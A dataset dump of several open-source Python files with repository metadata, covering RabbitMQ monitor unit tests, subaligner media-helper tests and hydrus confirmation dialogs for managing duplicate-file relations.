# messages in the queue.
res = self.test_monitor.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
# There must be 1 message in the queue, the processed data
self.assertEqual(1, res.method.message_count)
# Check that the message received is actually the processed data
_, _, body = self.test_monitor.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(expected_output_data, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(GitHubMonitor, "_send_data")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_send_data_raises_amqp_channel_error_on_channel_error(
        self, mock_get_data, mock_send_data) -> None:
    """An ``AMQPChannelError`` raised while sending data must propagate out
    of ``_monitor`` unhandled (so the caller can recreate the channel).
    """
    mock_get_data.return_value = self.retrieved_metrics_example
    mock_send_data.side_effect = pika.exceptions.AMQPChannelError('test')
    try:
        self.test_monitor._initialise_rabbitmq()
        self.assertRaises(pika.exceptions.AMQPChannelError,
                          self.test_monitor._monitor)
    except Exception as e:
        self.fail("Test failed: {}".format(e))
@freeze_time("2012-01-01")
@mock.patch.object(GitHubMonitor, "_send_heartbeat")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_send_hb_raises_amqp_chan_err_on_chan_err_and_sends_data(
        self, mock_get_data, mock_send_heartbeat) -> None:
    """If sending the heartbeat raises ``AMQPChannelError``, ``_monitor``
    must re-raise it, but the processed data (sent *before* the heartbeat)
    must already have been published to the raw-data exchange.
    """
    mock_get_data.return_value = self.retrieved_metrics_example
    mock_send_heartbeat.side_effect = \
        pika.exceptions.AMQPChannelError('test')
    # The exact message we expect to find on the raw-data exchange.
    expected_output_data = {
        'result': {
            'meta_data': {
                'monitor_name': self.test_monitor.monitor_name,
                'repo_name': self.test_monitor.repo_config.repo_name,
                'repo_id': self.test_monitor.repo_config.repo_id,
                'repo_parent_id': self.test_monitor.repo_config.parent_id,
                'time': datetime(2012, 1, 1).timestamp()
            },
            'data': self.processed_data_example,
        }
    }
    try:
        self.test_monitor._initialise_rabbitmq()
        # Start from an empty, freshly declared test queue.
        self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
        res = self.test_monitor.rabbitmq.queue_declare(
            queue=self.test_queue_name, durable=True, exclusive=False,
            auto_delete=False, passive=False
        )
        self.assertEqual(0, res.method.message_count)
        # Bind to both exchanges so anything published would land here.
        self.test_monitor.rabbitmq.queue_bind(
            queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
            routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
        self.test_monitor.rabbitmq.queue_bind(
            queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
            routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY)
        self.assertRaises(pika.exceptions.AMQPChannelError,
                          self.test_monitor._monitor)
        # By re-declaring the queue again we can get the number of
        # messages in the queue.
        res = self.test_monitor.rabbitmq.queue_declare(
            queue=self.test_queue_name, durable=True, exclusive=False,
            auto_delete=False, passive=True
        )
        # There must be 1 message in the queue, the processed data
        self.assertEqual(1, res.method.message_count)
        # Check that the message received is actually the processed data
        _, _, body = self.test_monitor.rabbitmq.basic_get(
            self.test_queue_name)
        self.assertEqual(expected_output_data, json.loads(body))
    except Exception as e:
        self.fail("Test failed: {}".format(e))
@mock.patch.object(GitHubMonitor, "_send_data")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_send_data_raises_amqp_conn_error_on_conn_error(
        self, mock_get_data, mock_send_data) -> None:
    """An ``AMQPConnectionError`` raised while sending data must propagate
    out of ``_monitor`` unhandled (so the caller can reconnect).
    """
    mock_get_data.return_value = self.retrieved_metrics_example
    mock_send_data.side_effect = pika.exceptions.AMQPConnectionError('test')
    try:
        self.test_monitor._initialise_rabbitmq()
        self.assertRaises(pika.exceptions.AMQPConnectionError,
                          self.test_monitor._monitor)
    except Exception as e:
        self.fail("Test failed: {}".format(e))
@freeze_time("2012-01-01")
@mock.patch.object(GitHubMonitor, "_send_heartbeat")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_send_hb_raises_amqp_conn_err_on_conn_err_and_sends_data(
        self, mock_get_data, mock_send_heartbeat) -> None:
    """If sending the heartbeat raises ``AMQPConnectionError``, ``_monitor``
    must re-raise it, but the processed data (sent *before* the heartbeat)
    must already have been published to the raw-data exchange.
    """
    mock_get_data.return_value = self.retrieved_metrics_example
    mock_send_heartbeat.side_effect = \
        pika.exceptions.AMQPConnectionError('test')
    # The exact message we expect to find on the raw-data exchange.
    expected_output_data = {
        'result': {
            'meta_data': {
                'monitor_name': self.test_monitor.monitor_name,
                'repo_name': self.test_monitor.repo_config.repo_name,
                'repo_id': self.test_monitor.repo_config.repo_id,
                'repo_parent_id': self.test_monitor.repo_config.parent_id,
                'time': datetime(2012, 1, 1).timestamp()
            },
            'data': self.processed_data_example,
        }
    }
    try:
        self.test_monitor._initialise_rabbitmq()
        # Start from an empty, freshly declared test queue.
        self.test_monitor.rabbitmq.queue_delete(self.test_queue_name)
        res = self.test_monitor.rabbitmq.queue_declare(
            queue=self.test_queue_name, durable=True, exclusive=False,
            auto_delete=False, passive=False
        )
        self.assertEqual(0, res.method.message_count)
        # Bind to both exchanges so anything published would land here.
        self.test_monitor.rabbitmq.queue_bind(
            queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
            routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
        self.test_monitor.rabbitmq.queue_bind(
            queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
            routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY)
        self.assertRaises(pika.exceptions.AMQPConnectionError,
                          self.test_monitor._monitor)
        # By re-declaring the queue again we can get the number of
        # messages in the queue.
        res = self.test_monitor.rabbitmq.queue_declare(
            queue=self.test_queue_name, durable=True, exclusive=False,
            auto_delete=False, passive=True
        )
        # There must be 1 message in the queue, the processed data
        self.assertEqual(1, res.method.message_count)
        # Check that the message received is actually the processed data
        _, _, body = self.test_monitor.rabbitmq.basic_get(
            self.test_queue_name)
        self.assertEqual(expected_output_data, json.loads(body))
    except Exception as e:
        self.fail("Test failed: {}".format(e))
@mock.patch.object(GitHubMonitor, "_send_data")
@mock.patch.object(GitHubMonitor, "_get_data")
def test_monitor_does_not_send_hb_and_data_if_send_data_fails(
        self, mock_get_data, mock_send_data) -> None:
    """Whatever exception ``_send_data`` raises, ``_monitor`` must re-raise
    it and publish nothing — neither data nor a heartbeat may reach the
    exchanges.
    """
    mock_get_data.return_value = self.retrieved_metrics_example
    # Map each raised exception *instance* to the type _monitor must
    # re-raise; each case is exercised in turn below.
    exception_types_dict = \
        {
            Exception('test'): Exception,
            pika.exceptions.AMQPConnectionError('test'):
                pika.exceptions.AMQPConnectionError,
            pika.exceptions.AMQPChannelError('test'):
                pika.exceptions.AMQPChannelError,
            MessageWasNotDeliveredException('test'):
                MessageWasNotDeliveredException
        }
    try:
        self.test_monitor._initialise_rabbitmq()
        for exception, exception_type in exception_types_dict.items():
            mock_send_data.side_effect = exception
            # Re-create an empty test queue for every case.
            self.test_monitor.rabbitmq.queue_delete(
                self.test_queue_name)
            res = self.test_monitor.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True, exclusive=False,
                auto_delete=False, passive=False
            )
            self.assertEqual(0, res.method.message_count)
            # Bind to both exchanges so anything published would land here.
            self.test_monitor.rabbitmq.queue_bind(
                queue=self.test_queue_name,
                exchange=HEALTH_CHECK_EXCHANGE,
                routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY)
            self.test_monitor.rabbitmq.queue_bind(
                queue=self.test_queue_name, exchange=RAW_DATA_EXCHANGE,
                routing_key=GITHUB_RAW_DATA_ROUTING_KEY)
            self.assertRaises(exception_type, self.test_monitor._monitor)
            # By re-declaring the queue again we can get the number of
            # messages in the queue.
            res = self.test_monitor.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True,
                exclusive=False, auto_delete=False, passive=True
            )
            # There must be no messages in the queue.
            self.assertEqual(0, res.method.message_count)
    except Exception as e:
        self.fail("Test failed: {}".format(e))
| 46.912114
| 80
| 0.62157
| 4,467
| 39,500
| 5.181554
| 0.068278
| 0.08226
| 0.098505
| 0.076514
| 0.820271
| 0.791713
| 0.771494
| 0.736672
| 0.728636
| 0.715934
| 0
| 0.007197
| 0.299975
| 39,500
| 841
| 81
| 46.967895
| 0.829807
| 0.093722
| 0
| 0.627246
| 0
| 0
| 0.049104
| 0.001288
| 0
| 0
| 0
| 0
| 0.085329
| 1
| 0.038922
| false
| 0.034431
| 0.026946
| 0
| 0.067365
| 0.001497
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a3c37298c5c61b9a81ea83aa65f232528536f622
| 10,790
|
py
|
Python
|
tests/subaligner/test_media_helper.py
|
JohnVillalovos/subaligner
|
41bd00b4661b4ba35bdd2915e89fc368dcc7663a
|
[
"MIT"
] | null | null | null |
tests/subaligner/test_media_helper.py
|
JohnVillalovos/subaligner
|
41bd00b4661b4ba35bdd2915e89fc368dcc7663a
|
[
"MIT"
] | null | null | null |
tests/subaligner/test_media_helper.py
|
JohnVillalovos/subaligner
|
41bd00b4661b4ba35bdd2915e89fc368dcc7663a
|
[
"MIT"
] | null | null | null |
import unittest
import os
import pysrt
import subprocess
from subaligner.exception import TerminalException, NoFrameRateException
from subaligner.media_helper import MediaHelper as Undertest
from mock import patch, Mock
class MediaHelperTests(unittest.TestCase):
    """Tests for subaligner's MediaHelper: audio extraction, duration
    arithmetic and frame-rate probing against bundled media fixtures."""

    def setUp(self):
        """Resolve fixture paths and reset the artefact bookkeeping."""
        # Fixtures live in a "resource" directory next to this module.
        resource_dir = os.path.join(
            os.path.dirname(os.path.abspath(__file__)), "resource"
        )
        self.__video_file_path = os.path.join(resource_dir, "test.mp4")
        self.__subtitle_file_path = os.path.join(resource_dir, "test.srt")
        self.__test_audio_path = os.path.join(resource_dir, "test.wav")
        # Artefacts produced by individual tests; removed in tearDown.
        self.__audio_file_path = None
        self.__segment_paths = []

    def tearDown(self):
        """Remove any audio artefacts a test produced."""
        # Plain `if` statements instead of conditional expressions abused
        # as statements purely for their side effects.
        if self.__audio_file_path is not None:
            if os.path.isfile(self.__audio_file_path):
                os.remove(self.__audio_file_path)
        if self.__segment_paths is not None:
            for segment_path in self.__segment_paths:
                if os.path.isfile(segment_path):
                    os.remove(segment_path)

    def test_extract_audio_wav(self):
        """Extracting to WAV at 16 kHz produces a file on disk."""
        self.__audio_file_path = Undertest.extract_audio(
            self.__video_file_path, True, 16000
        )
        self.assertTrue(os.path.isfile(self.__audio_file_path))

    def test_extract_audio_aac(self):
        """Extracting with default arguments (AAC) produces a file on disk."""
        self.__audio_file_path = Undertest.extract_audio(self.__video_file_path)
        self.assertTrue(os.path.isfile(self.__audio_file_path))

    def test_extract_audio_wav_from_start(self):
        """Clipping from a start time with no end yields a file and no duration."""
        self.__audio_file_path = Undertest.extract_audio(
            self.__video_file_path, True, 16000
        )
        segment_path, duration = Undertest.extract_audio_from_start_to_end(
            self.__audio_file_path, "00:00:13,750"
        )
        self.assertTrue(os.path.isfile(segment_path))
        self.__segment_paths.append(segment_path)
        # Without an end timestamp the helper cannot compute a duration.
        self.assertIsNone(duration)

    def test_get_duration_in_seconds(self):
        """Duration between two SRT timestamps is computed in seconds."""
        duration = Undertest.get_duration_in_seconds(
            start="02:10:12,222", end="03:12:24,328"
        )
        self.assertEqual(3732.106, duration)

    def test_get_duration_in_seconds_without_start(self):
        """A missing start timestamp is treated as 00:00:00,000."""
        duration = Undertest.get_duration_in_seconds(start=None, end="01:01:01,100")
        self.assertEqual(3661.100, duration)

    def test_extract_audio_wav_from_start_to_end(self):
        """Clipping between two timestamps yields a file and the clip duration."""
        self.__audio_file_path = Undertest.extract_audio(
            self.__video_file_path, True, 16000
        )
        segment_path, duration = Undertest.extract_audio_from_start_to_end(
            self.__audio_file_path, "00:00:13,750", "00:00:16,150"
        )
        self.assertTrue(os.path.isfile(segment_path))
        self.__segment_paths.append(segment_path)
        self.assertEqual(2.4, duration)

    def test_get_audio_segment_starts_and_ends(self):
        """Segment starts/ends and the regrouped subtitles line up 1:1."""
        subs = pysrt.open(self.__subtitle_file_path, encoding="utf-8")
        segment_starts, segment_ends, new_subs = Undertest.get_audio_segment_starts_and_ends(
            subs
        )
        self.assertEqual(len(segment_starts), len(segment_ends))
        self.assertEqual(len(segment_starts), len(new_subs))
        for sub in new_subs:
            self.assertIsInstance(sub, pysrt.SubRipFile)

    def test_get_frame_rate(self):
        """The bundled fixture video is known to be 24 fps."""
        self.assertEqual(24.0, Undertest.get_frame_rate(self.__video_file_path))

    def test_throw_terminal_exception_on_bad_video(self):
        """A nonexistent video raises TerminalException and leaves no output."""
        try:
            Undertest.extract_audio("bad_video_file_path", True, 16000)
        except Exception as e:
            self.assertTrue(isinstance(e, TerminalException))
            self.assertFalse(os.path.exists("bad_video_file_path.mp4.wav"))
        else:
            self.fail("Should have thrown exception")

    @patch("subprocess.Popen")
    def test_throw_exception_on_extract_audio_with_error_code(self, mock_popen):
        """A non-zero ffmpeg exit status surfaces as a TerminalException."""
        # Configure the *process instance* (Popen(...) returns
        # mock_popen.return_value), not the patched class object: attributes
        # set on the class mock were never seen by the code under test.
        process = mock_popen.return_value
        process.returncode = 1
        process.communicate.return_value = 1
        try:
            Undertest.extract_audio(self.__video_file_path)
        except Exception as e:
            # `Mock.called_with(...)` is not an assertion — it returns an
            # always-truthy child mock — so assert on `.called` instead.
            self.assertTrue(process.communicate.called)
            self.assertTrue(isinstance(e, TerminalException))
            self.assertTrue("Cannot extract audio from video:" in str(e))
        else:
            self.fail("Should have thrown exception")

    @patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("", 1.0))
    def test_throw_exception_on_extract_audio_timeout(self, mock_communicate):
        """A subprocess timeout surfaces as a TerminalException with a timeout message."""
        try:
            Undertest.extract_audio(self.__video_file_path)
        except Exception as e:
            self.assertTrue(mock_communicate.called)
            self.assertTrue(isinstance(e, TerminalException))
            self.assertTrue("Timeout on extracting audio from video:" in str(e))
        else:
            self.fail("Should have thrown exception")

    @patch("subprocess.Popen.communicate", side_effect=KeyboardInterrupt)
    def test_throw_exception_on_extract_audio_interrupted(self, mock_communicate):
        """A KeyboardInterrupt during extraction surfaces as a TerminalException."""
        try:
            Undertest.extract_audio(self.__video_file_path)
        except Exception as e:
            self.assertTrue(mock_communicate.called)
            self.assertTrue(isinstance(e, TerminalException))
            self.assertTrue("interrupted" in str(e))
        else:
            self.fail("Should have thrown exception")

    @patch("subprocess.Popen.communicate", side_effect=Exception())
    def test_throw_exception_on_vtt2srt_exception(self, mock_communicate):
        """An arbitrary subprocess failure surfaces as a TerminalException.

        NOTE(review): despite the name this exercises extract_audio, not a
        vtt-to-srt conversion — consider renaming in a follow-up.
        """
        try:
            Undertest.extract_audio(self.__video_file_path)
        except Exception as e:
            self.assertTrue(mock_communicate.called)
            self.assertTrue(isinstance(e, TerminalException))
            self.assertTrue("Cannot extract audio from video:" in str(e))
        else:
            self.fail("Should have thrown exception")

    @patch("subprocess.Popen.communicate", return_value=1)
    def test_throw_exception_on_extract_partial_audio_with_error_code(self, mock_communicate):
        """A failed ffmpeg clip invocation surfaces as a TerminalException."""
        try:
            Undertest.extract_audio_from_start_to_end(
                self.__test_audio_path, "00:00:13,750", "00:00:16,150"
            )
        except Exception as e:
            self.assertTrue(mock_communicate.called)
            self.assertTrue(isinstance(e, TerminalException))
            self.assertTrue("Cannot clip audio:" in str(e))
        else:
            self.fail("Should have thrown exception")

    @patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("", 1.0))
    def test_throw_exception_on_extract_partial_audio_timeout(self, mock_communicate):
        """A clip timeout surfaces as a TerminalException with a timeout message."""
        try:
            Undertest.extract_audio_from_start_to_end(
                self.__test_audio_path, "00:00:13,750", "00:00:16,150"
            )
        except Exception as e:
            self.assertTrue(mock_communicate.called)
            self.assertTrue(isinstance(e, TerminalException))
            self.assertTrue("Timeout on extracting audio from audio:" in str(e))
        else:
            self.fail("Should have thrown exception")

    @patch("subprocess.Popen.communicate", side_effect=Exception())
    def test_throw_exception_on_extract_partial_audio_exception(self, mock_communicate):
        """An arbitrary clip failure surfaces as a TerminalException."""
        try:
            Undertest.extract_audio_from_start_to_end(
                self.__test_audio_path, "00:00:13,750", "00:00:16,150"
            )
        except Exception as e:
            self.assertTrue(mock_communicate.called)
            self.assertTrue(isinstance(e, TerminalException))
            self.assertTrue("Cannot clip audio:" in str(e))
        else:
            self.fail("Should have thrown exception")

    @patch("subprocess.Popen.communicate", side_effect=KeyboardInterrupt)
    def test_throw_exception_on_extract_partial_audio_interrupted(self, mock_communicate):
        """A KeyboardInterrupt during clipping surfaces as a TerminalException."""
        try:
            Undertest.extract_audio_from_start_to_end(
                self.__test_audio_path, "00:00:13,750", "00:00:16,150"
            )
        except Exception as e:
            self.assertTrue(mock_communicate.called)
            self.assertTrue(isinstance(e, TerminalException))
            self.assertTrue("interrupted" in str(e))
        else:
            self.fail("Should have thrown exception")

    def test_throw_no_frame_rate_exception_on_audio(self):
        """Probing a pure-audio file for a frame rate raises NoFrameRateException."""
        try:
            Undertest.get_frame_rate(self.__test_audio_path)
        except Exception as e:
            self.assertTrue(isinstance(e, NoFrameRateException))
        else:
            self.fail("Should have thrown exception")

    @patch("subprocess.Popen.communicate", return_value=1)
    def test_throw_exception_on_get_frame_rate(self, mock_communicate):
        """A failed ffprobe invocation surfaces as a NoFrameRateException."""
        try:
            Undertest.get_frame_rate(self.__video_file_path)
        except Exception as e:
            self.assertTrue(mock_communicate.called)
            self.assertTrue(isinstance(e, NoFrameRateException))
            self.assertTrue("Cannot extract the frame rate from video:" in str(e))
        else:
            self.fail("Should have thrown exception")

    @patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("", 1.0))
    def test_throw_exception_on_get_frame_rate_timeout(self, mock_communicate):
        """A frame-rate probe timeout surfaces as a NoFrameRateException."""
        try:
            Undertest.get_frame_rate(self.__video_file_path)
        except Exception as e:
            self.assertTrue(mock_communicate.called)
            self.assertTrue(isinstance(e, NoFrameRateException))
            self.assertTrue("Timeout on extracting the frame rate from video:" in str(e))
        else:
            self.fail("Should have thrown exception")

    @patch("subprocess.Popen.communicate", side_effect=Exception())
    def test_throw_exception_on_get_frame_rate_exception(self, mock_communicate):
        """An arbitrary probe failure surfaces as a NoFrameRateException."""
        try:
            Undertest.get_frame_rate(self.__video_file_path)
        except Exception as e:
            self.assertTrue(mock_communicate.called)
            self.assertTrue(isinstance(e, NoFrameRateException))
            self.assertTrue("Cannot extract the frame rate from video:" in str(e))
        else:
            self.fail("Should have thrown exception")

    @patch("subprocess.Popen.communicate", side_effect=KeyboardInterrupt)
    def test_throw_exception_on_get_frame_rate_interrupted(self, mock_communicate):
        """A KeyboardInterrupt during probing surfaces as a TerminalException."""
        try:
            Undertest.get_frame_rate(self.__video_file_path)
        except Exception as e:
            self.assertTrue(mock_communicate.called)
            self.assertTrue(isinstance(e, TerminalException))
            self.assertTrue("interrupted" in str(e))
        else:
            self.fail("Should have thrown exception")
# Allow running this test module directly, outside a pytest/unittest runner.
if __name__ == "__main__":
    unittest.main()
| 42.648221
| 94
| 0.674791
| 1,299
| 10,790
| 5.274057
| 0.107005
| 0.085827
| 0.030361
| 0.034739
| 0.837688
| 0.815647
| 0.781492
| 0.755072
| 0.70632
| 0.696833
| 0
| 0.022039
| 0.234662
| 10,790
| 252
| 95
| 42.81746
| 0.807581
| 0
| 0
| 0.587444
| 0
| 0
| 0.123726
| 0.031047
| 0
| 0
| 0
| 0
| 0.2287
| 1
| 0.107623
| false
| 0
| 0.03139
| 0
| 0.143498
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a3fd16ede73dbbb8a29dda27dfd73323324fc854
| 45
|
py
|
Python
|
representation_learning_for_transcriptomics/supervised/predictors/regressors/__init__.py
|
unlearnai/representation_learning_for_transcriptomics
|
66e7a31471ca3ded5d46945d34c74bad8f22afbf
|
[
"CC-BY-4.0"
] | 3
|
2020-03-30T00:36:11.000Z
|
2021-05-07T18:43:27.000Z
|
representation_learning_for_transcriptomics/supervised/predictors/regressors/__init__.py
|
unlearnai/representation_learning_for_transcriptomics
|
66e7a31471ca3ded5d46945d34c74bad8f22afbf
|
[
"CC-BY-4.0"
] | null | null | null |
representation_learning_for_transcriptomics/supervised/predictors/regressors/__init__.py
|
unlearnai/representation_learning_for_transcriptomics
|
66e7a31471ca3ded5d46945d34c74bad8f22afbf
|
[
"CC-BY-4.0"
] | null | null | null |
from .proportional_hazard_regressor import *
| 22.5
| 44
| 0.866667
| 5
| 45
| 7.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.902439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
430663ee688fa24dff6590627c73da259bf3e17e
| 9,170
|
py
|
Python
|
include/ClientGUIDuplicates.py
|
sorashi/hydrus
|
0544a75d2117904b42e935d264ae35ded5cbf36a
|
[
"WTFPL"
] | null | null | null |
include/ClientGUIDuplicates.py
|
sorashi/hydrus
|
0544a75d2117904b42e935d264ae35ded5cbf36a
|
[
"WTFPL"
] | null | null | null |
include/ClientGUIDuplicates.py
|
sorashi/hydrus
|
0544a75d2117904b42e935d264ae35ded5cbf36a
|
[
"WTFPL"
] | null | null | null |
from . import ClientGUIDialogsQuick
from . import HydrusExceptions
import os
import traceback
from . import HydrusData
from . import HydrusGlobals as HG
from qtpy import QtWidgets as QW
def ClearFalsePositives( win, hashes ):
    """Ask the user to confirm, then clear false-positive relations for the given file hashes."""
    separator = os.linesep * 2

    if len( hashes ) == 1:
        paragraphs = (
            'Are you sure you want to clear this file of its false-positive relations?',
            'False-positive relations are recorded between alternate groups, so this change will also affect any files this file is alternate to.',
            'All affected files will be queued up for another potential duplicates search, so you will likely see at least one of them again in the duplicate filter.'
        )
    else:
        paragraphs = (
            'Are you sure you want to clear these {} files of their false-positive relations?'.format( HydrusData.ToHumanInt( len( hashes ) ) ),
            'False-positive relations are recorded between alternate groups, so this change will also affect all alternate files to your selection.',
            'All affected files will be queued up for another potential duplicates search, so you will likely see some of them again in the duplicate filter.'
        )

    message = separator.join( paragraphs )

    # Only proceed on an explicit yes from the user.
    if ClientGUIDialogsQuick.GetYesNo( win, message ) == QW.QDialog.Accepted:
        HG.client_controller.Write( 'clear_false_positive_relations', hashes )
def DissolveAlternateGroup( win, hashes ):
    """Ask the user to confirm, then dissolve the entire alternates group(s) of the given file hashes."""
    separator = os.linesep * 2

    if len( hashes ) == 1:
        paragraphs = (
            'Are you sure you want to dissolve this file\'s entire alternates group?',
            'This will completely remove all duplicate, alternate, and false-positive relations for all files in the group and set them to come up again in the duplicate filter.',
            'This is a potentially big change that throws away many previous decisions and cannot be undone. If you can achieve your result just by removing some alternate members, do that instead.'
        )
    else:
        paragraphs = (
            'Are you sure you want to dissolve these {} files\' entire alternates groups?'.format( HydrusData.ToHumanInt( len( hashes ) ) ),
            'This will completely remove all duplicate, alternate, and false-positive relations for all alternate groups of all files selected and set them to come up again in the duplicate filter.',
            'This is a potentially huge change that throws away many previous decisions and cannot be undone. If you can achieve your result just by removing some alternate members, do that instead.'
        )

    message = separator.join( paragraphs )

    # Only proceed on an explicit yes from the user.
    if ClientGUIDialogsQuick.GetYesNo( win, message ) == QW.QDialog.Accepted:
        HG.client_controller.Write( 'dissolve_alternates_group', hashes )
def DissolveDuplicateGroup( win, hashes ):
    """Ask the user to confirm, then dissolve the duplicate group(s) of the given file hashes."""
    separator = os.linesep * 2

    if len( hashes ) == 1:
        paragraphs = (
            'Are you sure you want to dissolve this file\'s duplicate group?',
            'This will split the duplicates group back into individual files and remove any alternate relations they have. They will be queued back up in the duplicate filter for reprocessing.',
            'This could be a big change that throws away many previous decisions and cannot be undone. If you can achieve your result just by removing one or two members, do that instead.'
        )
    else:
        paragraphs = (
            'Are you sure you want to dissolve these {} files\' duplicate groups?'.format( HydrusData.ToHumanInt( len( hashes ) ) ),
            'This will split all the files\' duplicates groups back into individual files and remove any alternate relations they have. They will all be queued back up in the duplicate filter for reprocessing.',
            'This could be a huge change that throws away many previous decisions and cannot be undone. If you can achieve your result just by removing some members, do that instead.'
        )

    message = separator.join( paragraphs )

    # Only proceed on an explicit yes from the user.
    if ClientGUIDialogsQuick.GetYesNo( win, message ) == QW.QDialog.Accepted:
        HG.client_controller.Write( 'dissolve_duplicates_group', hashes )
def RemoveFromAlternateGroup( win, hashes ):
    """Ask the user to confirm, then remove the given file hashes from their alternates groups."""
    separator = os.linesep * 2

    if len( hashes ) == 1:
        paragraphs = (
            'Are you sure you want to remove this file from its alternates group?',
            'Alternate relationships are stored between duplicate groups, so this will pull any duplicates of your file with it.',
            'The removed file (and any duplicates) will be queued up for another potential duplicates search, so you will likely see at least one again in the duplicate filter.'
        )
    else:
        paragraphs = (
            'Are you sure you want to remove these {} files from their alternates groups?'.format( HydrusData.ToHumanInt( len( hashes ) ) ),
            'Alternate relationships are stored between duplicate groups, so this will pull any duplicates of these files with them.',
            'The removed files (and any duplicates) will be queued up for another potential duplicates search, so you will likely see some again in the duplicate filter.'
        )

    message = separator.join( paragraphs )

    # Only proceed on an explicit yes from the user.
    if ClientGUIDialogsQuick.GetYesNo( win, message ) == QW.QDialog.Accepted:
        HG.client_controller.Write( 'remove_alternates_member', hashes )
def RemoveFromDuplicateGroup( win, hashes ):
    """Ask the user to confirm, then remove the given file hashes from their duplicate groups."""
    separator = os.linesep * 2

    if len( hashes ) == 1:
        paragraphs = (
            'Are you sure you want to remove this file from its duplicate group?',
            'The remaining group will be otherwise unaffected and will keep its alternate relationships.',
            'The removed file will be queued up for another potential duplicates search, so you will likely see it again in the duplicate filter.'
        )
    else:
        paragraphs = (
            'Are you sure you want to remove these {} files from their duplicate groups?'.format( HydrusData.ToHumanInt( len( hashes ) ) ),
            'The remaining groups will be otherwise unaffected and keep their alternate relationships.',
            'The removed files will be queued up for another potential duplicates search, so you will likely see them again in the duplicate filter.'
        )

    message = separator.join( paragraphs )

    # Only proceed on an explicit yes from the user.
    if ClientGUIDialogsQuick.GetYesNo( win, message ) == QW.QDialog.Accepted:
        HG.client_controller.Write( 'remove_duplicates_member', hashes )
def RemovePotentials( win, hashes ):
    """Ask the user to confirm, then remove all potential-duplicate pairs of the given file hashes."""
    separator = os.linesep * 2

    if len( hashes ) == 1:
        paragraphs = (
            'Are you sure you want to remove all of this file\'s potentials?',
            'This will mean it (or any of its duplicates) will not appear in the duplicate filter unless new potentials are found with new files. Use this command if the file has accidentally received many false positive potential relationships.'
        )
    else:
        paragraphs = (
            'Are you sure you want to remove all of these {} files\' potentials?'.format( HydrusData.ToHumanInt( len( hashes ) ) ),
            'This will mean they (or any of their duplicates) will not appear in the duplicate filter unless new potentials are found with new files. Use this command if the files have accidentally received many false positive potential relationships.'
        )

    message = separator.join( paragraphs )

    # Only proceed on an explicit yes from the user.
    if ClientGUIDialogsQuick.GetYesNo( win, message ) == QW.QDialog.Accepted:
        HG.client_controller.Write( 'remove_potential_pairs', hashes )
def ResetPotentialSearch( win, hashes ):
    """Ask the user to confirm, then reset the potential-duplicates search status of the given file hashes.

    Fix: corrected the user-facing misspelling 'occured' -> 'occurred' in
    both the singular and plural confirmation messages.
    """
    if len( hashes ) == 1:
        message = 'Are you sure you want to search this file for potential duplicates again?'
        message += os.linesep * 2
        message += 'This will not remove any existing potential pairs, and will typically not find any new relationships unless an error has occurred.'
    else:
        message = 'Are you sure you want to search these {} files for potential duplicates again?'.format( HydrusData.ToHumanInt( len( hashes ) ) )
        message += os.linesep * 2
        message += 'This will not remove any existing potential pairs, and will typically not find any new relationships unless an error has occurred.'

    result = ClientGUIDialogsQuick.GetYesNo( win, message )

    # Only proceed on an explicit yes from the user.
    if result == QW.QDialog.Accepted:
        HG.client_controller.Write( 'reset_potential_search_status', hashes )
| 50.10929
| 259
| 0.67132
| 1,178
| 9,170
| 5.206282
| 0.13837
| 0.035219
| 0.062612
| 0.066525
| 0.842818
| 0.833687
| 0.833687
| 0.797489
| 0.760802
| 0.741888
| 0
| 0.004595
| 0.264231
| 9,170
| 182
| 260
| 50.384615
| 0.904402
| 0
| 0
| 0.486486
| 0
| 0.063063
| 0.50349
| 0.01952
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063063
| false
| 0
| 0.063063
| 0
| 0.126126
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
